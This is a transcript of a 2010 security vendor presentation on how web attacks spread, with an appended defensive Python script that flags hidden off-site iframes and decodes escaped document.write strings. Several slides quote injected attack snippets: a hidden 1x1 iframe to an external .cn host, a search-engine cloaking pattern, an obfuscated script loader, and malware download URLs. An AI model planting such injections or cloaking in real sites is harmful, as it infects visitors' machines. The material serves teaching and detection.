
The Anatomy of a Web Attack

The Anatomy of a Web Attack. Dennis Pike Systems Engineer Geo Specialists Lead – Americas Security dennis.pike@bluecoat.com. Agenda. State of the Web Top categories Top attacks The Anatomy of a Web Attack Lures to web threats Examples Dynamic Link Analysis. Best of the Worst.


Presentation Transcript


  1. The Anatomy of a Web Attack Dennis Pike Systems Engineer Geo Specialists Lead – Americas Security dennis.pike@bluecoat.com

  2. Agenda • State of the Web • Top categories • Top attacks • The Anatomy of a Web Attack • Lures to web threats • Examples • Dynamic Link Analysis

  3. Best of the Worst
     • Top Web Category? >> Among the top ten active categories of 2009, social networking access accounted for 25 percent of all Web access activity.
     • Top Web threat? >> Fake Antivirus was the most successful Web threat in 2009, followed by the Fake Video Codec offer.
       >> New Fake AV installer programs increased from an average of 300 to 1,462 per day in the second half of 2009. *
       >> Average lifetime of sites that redirect users to Web pages that try to install scareware decreased, with a median lifetime dropping below 100 hours around April 2009, below 10 hours around September 2009, and below one hour since January 2010. *
     * Google Inc.

  4. Email vs Social Networking • Do more people use email or social networking sites? >> According to Nielsen Co., in August 2009, 277 million people used email across the U.S., several European countries, Brazil and Australia, a 21 percent increase from the year before. But the number of users on social networking and other community sites jumped 31 percent to 302 million, bypassing the email user population by 10 percent.

  5. Noteworthy Items Argument for Video (HTTP and Streaming)

  6. Changing Web Habits
     • Top 10 Categories – 2009 (WebFilter/WebPulse, 62M+ Users): 1. Social Networking; 2. Web Advertisements; 3. Search Engines/Portals; 4. Personals/Dating; 5. Pornography; 6. Computers/Internet; 7. Audio/Video Clips; 8. Adult/Mature Content; 9. Web Email; 10. Illegal/Questionable
     • Social Networking: moved to #1 from #2 position; represents 25% of Top 10 requests
     • Web Email: dropped to #9 from #5 position; users migrating to social networking
     • Cyber Crime Leverages: search engine poisoning; Fake AV and Codec updates; popular site injections; Death, Drama & Disaster lures; Health & Wealth scams

  7. Web Threats Rising Exponentially • 2/3 of all known malicious code threats in 1 year (Symantec April’09) • 1 in 150 Webpages infected in 2009 vs. 1 in 20,000 in 2006 (Kaspersky)

  8. Distribution Power
     • Botnet computing power to: pitch worthless products; hijack online banking accounts; steal corporate data
     • Top 5 Botnets in 2009: Koobface B, Koobface D, Botnet Zeus, Monkif A, Clickbot
     • Peak number of active bots: 1,070,000; 812,000; 599,000; 506,000; 375,000
     • How it spreads: Search Results, Facebook, Twitter, Social Networking
     USA TODAY Research – March 2010

  9. An Invitation to Crime
     1 – An automated program logs on to a social network using stolen user credentials.
     2 – The program messages the user's friends, asking them to click on a link to a photo or video.
     3 – Anyone who clicks on the link is asked to enable a media player needed to see the images. Running the file turns the PC into a bot.
     4 – The bot steals the PC owner's logon credentials, starting the cycle again.
     USA TODAY Research – March 2010

  10. Web Evolution • Static Pages → Dynamic Pages • Dynamic Pages → Interactive Pages • Publishing Model → Community Model • Single Host Pages → Multi-Host Pages • Nice to Have → Must Have

  11. Multi-Host Pages [Diagram label: SPORT]

  12. Paths to Malware Infection [Diagram labels: Link Farms; Infected Site; Search Engine; Blogs, Forums; Relay; Bait; Malware]

  13. End User … Infected Site
     • Page served by www.inka.com:
       <html> … <iframe src="http://homenameregistration.cn/in.cgi?income12" width=1 height=1 style="visibility: hidden"></iframe><div id="header"> … </html>
     • iframe target: homenameregistration.cn/in.cgi?income12

  14. Web 2.0 and Search Engines • Forums • Blogs • Wikis • Guestbooks [Diagram labels: WWW; ?; Search Engine View]

  15. Web 2.0 and Search Engines [Diagram labels: WWW; Links…; Words…; Search Engine View; Links…]

  16. Hijacked Website
     • xdesignstudios.com / dir1 / index.php:
       if ("search engine") { echo "…indexable content…" } else { echo '<body><script src="live.js"></script>' }
     • Query strings under index.php: … id=fall+printable+coloring+pages; id=free+printable+easter+drawings; id=disney+printable+cartoon+characters; id=free+printable+halloween+sheets; id=girls+free+printable+organizer; id=in+store+printable+catherines+coupons …
     • live.js

  17. End User … Search Engine Redirect
     • index.php?id=hannah-montana-printable-birthday-invitations
       <body> <script src="live.js"></script>
     • live.js:
       document.write(unescape('%3C%53%43%52%49%50%54%20%20%20%20%6C%61%6E%67%75…
     • http://cracksinside.com/red/gen.js

  18. What just happened? [Diagram labels: WWW; Links…; Words…; Search Engine View; Links…; Redirect]

  19. Recent Examples - VBMania
     • www.sharedocuments.com/library/PDF_Document21.025542010.pdf
     • Email text: www.sharedocuments.com/library/PDF_Document21.025542010.pdf
     • members.multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr

  20. Recent Examples – Fake Warez
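
Slides 13 and 17 show two markers a defender can look for in a fetched page: an invisible off-site iframe and a percent-escaped string passed to document.write(unescape(...)). The following static triage script is an added example, not part of the presentation; the function and class names are hypothetical, and the sample page is constructed from the two slide snippets plus one benign iframe.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Constructed sample: the snippets from slides 13 and 17 joined into one page,
# plus a benign same-site iframe. The escaped string stops where the slide
# cuts it off.
SAMPLE = '''<html><body>
<iframe src="http://homenameregistration.cn/in.cgi?income12" width=1 height=1
 style="visibility: hidden"></iframe><div id="header"></div>
<iframe src="/local/banner.html" width=300 height=250></iframe>
<script>document.write(unescape('%3C%53%43%52%49%50%54%20%20%20%20%6C%61%6E%67%75'));</script>
</body></html>'''

HIDDEN_CSS = re.compile(r'visibility\s*:\s*hidden|display\s*:\s*none', re.I)
ESCAPED_WRITE = re.compile(
    r'document\.write\s*\(\s*unescape\s*\(\s*[\'"]((?:%[0-9A-Fa-f]{2}|[^\'"%])+)')

class IframeAudit(HTMLParser):
    """Collect iframes that point off-site and are invisible to the visitor."""
    def __init__(self, page_host):
        super().__init__()
        self.page_host, self.hits = page_host, []

    def handle_starttag(self, tag, attrs):
        if tag != 'iframe':
            return
        a = {k: (v or '') for k, v in attrs}
        host = urlparse(a.get('src', '')).hostname  # None for relative URLs
        tiny = a.get('width') in ('0', '1') and a.get('height') in ('0', '1')
        hidden = bool(HIDDEN_CSS.search(a.get('style', '')))
        if host and host != self.page_host and (tiny or hidden):
            self.hits.append(a['src'])

def triage(html, page_host):
    """Return (hidden off-site iframe URLs, decoded unescape() strings)."""
    audit = IframeAudit(page_host)
    audit.feed(html)
    # Percent-decode only; nothing is evaluated. latin-1 matches unescape(),
    # which maps each %XX to the single character with that code.
    decoded = [unquote(m, encoding='latin-1') for m in ESCAPED_WRITE.findall(html)]
    return audit.hits, decoded

if __name__ == '__main__':
    frames, payloads = triage(SAMPLE, 'www.inka.com')
    print('hidden off-site iframes:', frames)
    print('decoded document.write strings:', payloads)
```

Because slide 16 shows the hijacked site returning different content to search engines and to visitors, the HTML fed to such a check has to be the copy a visitor's browser received, not the indexed one.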
